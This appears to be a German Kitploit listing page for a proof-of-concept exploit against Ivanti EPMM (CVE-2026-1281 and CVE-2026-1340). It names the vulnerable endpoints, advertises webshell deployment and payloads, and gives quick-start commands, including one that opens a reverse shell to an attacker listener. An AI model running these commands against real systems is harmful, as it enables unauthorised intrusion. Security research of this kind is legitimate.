Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-1281-Ivanti-EPMM-RCE — Proof of Concept für CVE-2026-1281 & CVE-2026-1340 – Ivanti EPMM Pre-Auth RCE über Bash-Arithmetik-Erweiterung | Kitploit
Tools/GitHubGitHub/mehdiledeaut/cve-2026-1281-ivanti-epmm-rce
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubmehdiledeaut/cve-2026-1281-ivanti-epmm-rce

CVE-2026-1281-Ivanti-EPMM-RCE

Proof of Concept für CVE-2026-1281 & CVE-2026-1340 – Ivanti EPMM Pre-Auth RCE über Bash-Arithmetik-Erweiterung

Repository anzeigen
61vor 6 MonatenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-1281 & CVE-2026-1340 - Ivanti EPMM Pre-Auth RCE

License Python CVSS

⚠️ HAFTUNGSAUSSCHLUSS: Dieser PoC dient ausschließlich zu Bildungs- und Sicherheitsforschungszwecken. Die Nutzung ohne ausdrückliche Genehmigung ist illegal.

🎯 Beschreibung

Vollständiger Proof of Concept (PoC) für die Ausnutzung der Schwachstellen CVE-2026-1281 und CVE-2026-1340, die Ivanti Endpoint Manager Mobile (EPMM) betreffen. Diese Schwachstellen ermöglichen die Ausführung beliebigen Codes aus der Ferne (RCE) ohne Authentifizierung über einen Mechanismus der Bash-Arithmetik-Expansion.

Schwachstellen

  • CVE-2026-1281 : Code-Injection im Endpoint /mifs/c/appstore/fob/
  • CVE-2026-1340 : Code-Injection im Endpoint
/mifs/c/aftstore/fob/
  • CVSS-Score : 9.8 (Kritisch)
  • Ausnutzung : Aktiv in freier Wildbahn (Zero-Day)
  • 🚀 Funktionen

    • ✅ Automatisiertes Validierungs-Framework (8 Tests)
    • ✅ Pre-Auth RCE-Ausnutzung
    • ✅ Automatische Reverse Shell
    • ✅ Webshell-Bereitstellung
    • ✅ 50+ einsatzbereite Payloads
    • ✅ Erkennungsskripte für Blue Team
    • ✅ Vollständige Dokumentation

    📦 Installation

    root@kitploit:~
    git clone https://github.com/MehdiLeDeaut/CVE-2026-1281-Ivanti-EPMM-RCE.git
    cd CVE-2026-1281-Ivanti-EPMM-RCE
    pip3 install -r requirements.txt
    chmod +x *.py
    

    🎯 Schnellstart

    root@kitploit:~
    # Schwachstellentest
    python3 exploit.py -t https://target.com -c
    
    # RCE-Validierung
    python3 exploit.py -t https://target.com --test-rce
    
    # Reverse Shell
    python3 exploit.py -t https://target.com --reverse-shell 10.10.14.5:4444
    

    📚 Dokumentation

    • Vollständige README - Detaillierte technische Dokumentation
    • Benutzerhandbuch - Schritt-für-Schritt-Anleitung
    • Payloads - Sammlung von 50+ Payloads
    • Red-Team-Leitfaden - Operative Szenarien

    🔗 Referenzen

    • CERT-FR CERTFR-2026-ALE-001
    • Watchtowr Labs Analysis
    • CVE-2026-1281
    • CVE-2026-1340

    👤 Autor

    Mehdi Le Deaut - Cybersecurity Consultant | Red Team Specialist

    LinkedIn

    ⚖️ Lizenz

    Dieses Projekt ist unter der MIT-Lizenz lizenziert - siehe Datei LICENSE für weitere Details.

    🙏 Danksagungen

    • CERT-FR für die schnelle Warnung
    • Watchtowr Labs für die technische Analyse
    • Die Cybersicherheits-Community
    Tool herunterladen